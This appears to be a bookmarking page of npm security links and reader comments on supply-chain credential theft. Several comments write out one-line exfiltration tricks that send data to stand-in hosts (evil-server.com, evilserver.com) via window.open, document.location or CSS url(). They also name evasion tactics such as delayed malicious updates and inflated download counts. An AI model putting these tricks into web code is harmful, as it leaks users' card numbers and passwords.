recentpopularlog in

npm

« earlier   
I’m harvesting credit card numbers and passwords from your site. Here’s how.
Extremely legit concern.

Comments:

* npm package compromises did happen, e.g.
* https://github.com/conventional-changelog/conventional-changelog/issues/282#issuecomment-365367804
* https://www.bleepingcomputer.com/news/security/somebody-tried-to-hide-a-backdoor-in-a-popular-javascript-npm-package/
* https://www.theregister.co.uk/2017/08/02/chrome_web_developer_extension_hacked/

* Any way to prevent outgoing connections through
`window.open(‘https://legit-analytics.com?q=${payload}', ‘_blank’).close()` with CSP?
A: Wow, didn’t think of that and no, I don’t know if CSP can prevent that.


* "Not just NPM… Think of Joomla extensions or WordPress plugins. A nice way to compromise millions of “traditional” PHP based websites"

* "It isn’t that far from the truth. Something similar is happening already: https://blog.sucuri.net/2017/10/credit-card-stealer-investigation-uncovers-malware-ring.html"

* "Typosquatting attacks apply to any software dependency not just open source and not just npm. Malicious submissions happen in the walled garden Apple App Store and Google Play stores, but since they hold moderation capability centrally and have a large volume of paid staffers, they can do something about it faster than volunteers typically do. A fake WhatsApp app on Google Play store was downloaded by more than 1 million people before it was taken down.

This is definitely a conversation we need to have.

Surprised there was no mention of delayed attacks (e.g., gain trust, gain users, then inject malicious changes in a future version).

Another variation on this would be to approach maintainers (say 10k+ download Firefox or Chrome extension authors, or WordPress authors) and offer them a “custom” advertising program if they just install your code you pay them… maybe your ads seem easy or exceptionally non-intrusive, but that’s because the ads are not the true goal."

* "This is scary and let’s not forget the server side.
Node.js is becoming popular on the server side and backend developers are also using a lot of NPM dependencies without vetting them thoroughly.
For example an Express middleware module should be able to gather the same data and forward it wherever (…and there are a lot of Express middleware modules in the NPM repository).

Although there are perhaps more possibilities on the server side to prevent malicious code from communicating back (for example using network limitations) — I wouldn’t be surprised if most front facing Node.js servers had little limitations to what Internet hosts they could communicate with."

* "you could use webrtc datachannels for sending out data.. it is not affected by CSP at all .. yet..

https://github.com/w3c/webappsec-csp/issues/92"

* "At the end of the day, if you can do document.location = https://evil-server.com/bounce?q=data (e.g. in a form submit event) and bounce back to the original site quickly enough, you can get data out."

* "If the CSP doesn’t define a style-src you could use insertRule to add some css.
e.g. something::after { content:url(“evilserver.com/userdatastring”) }"

* "Yeah, Google Tag Manager scripts are super-dangerous, it’s so easy for someone to push a nasty script targeted at your site one day, then remove it the next."

* Chrome extensions with "Access data on all sites you visit" can easily swap crypto addresses on exchange sites with their own.

* "About npm, I’d add that an easy way to increase the level of trust of a package is to release many ‘patch’ versions per day. This artificially increases the number of downloads, because of the tons of services spending their time to spot package updates (CI tools, stats services and others)."
JavaScript  code  injection  attack  hack  security  against  npm  open  source 
18 hours ago by dandv
nickkolok/paraquire: Node.JS paranoidal require
"When you are installing a npm package, npm downloads all dependencies of that package. You couldn't be sure that none of the dependencies is malware. Now you almost CAN." (but see the notes)
npm  security 
19 hours ago by dandv
Libraries.io - The Open Source Discovery Service
Discover open source packages, modules and frameworks you can use in your code.
opensource  libraries  programming  software  search  development  npm  tools  reliability  confidence  grade  notes 
3 days ago by vrobin
I’m harvesting credit card numbers and passwords from your site. Here’s how.
The following is a true story. Or maybe it’s just based on a true story. Perhaps it’s not true at all. It’s been a frantic week of security scares — it seems like every day there’s a new…
adam  package.json  npm 
4 days ago by blurback
Somebody Tried to Hide a Backdoor in a Popular JavaScript npm Package
The Node Package Manager (npm) team avoided a disaster today when it discovered and blocked the distribution of a cleverly hidden backdoor mechanism inside a popular —albeit deprecated— JavaScript package.

The actual backdoor mechanism was found in "getcookies," a relatively newly created npm package (JavaScript library) for working with browser cookies.
npm  backdoor  cybersecurity 
4 days ago by bwiese
52% of All JavaScript npm Packages Could Have Been Hacked via Weak Credentials
Tens of thousands of developers using weak credentials to secure their npm accounts inadvertently put more than half of the npm packages (JavaScript libraries and tools) at risk of getting hijacked and used to deploy malicious code to legitimate applications that use them in their build process.
npm  javascript  cybersecurity  credentials 
4 days ago by bwiese
B E E F Y | a tiny browserify server
Local development server that aims to make using browserify fast and fun
javascript  development  npm  browserify  node  server  cli  beefy  github 
5 days ago by moalex

Copy this bookmark:





to read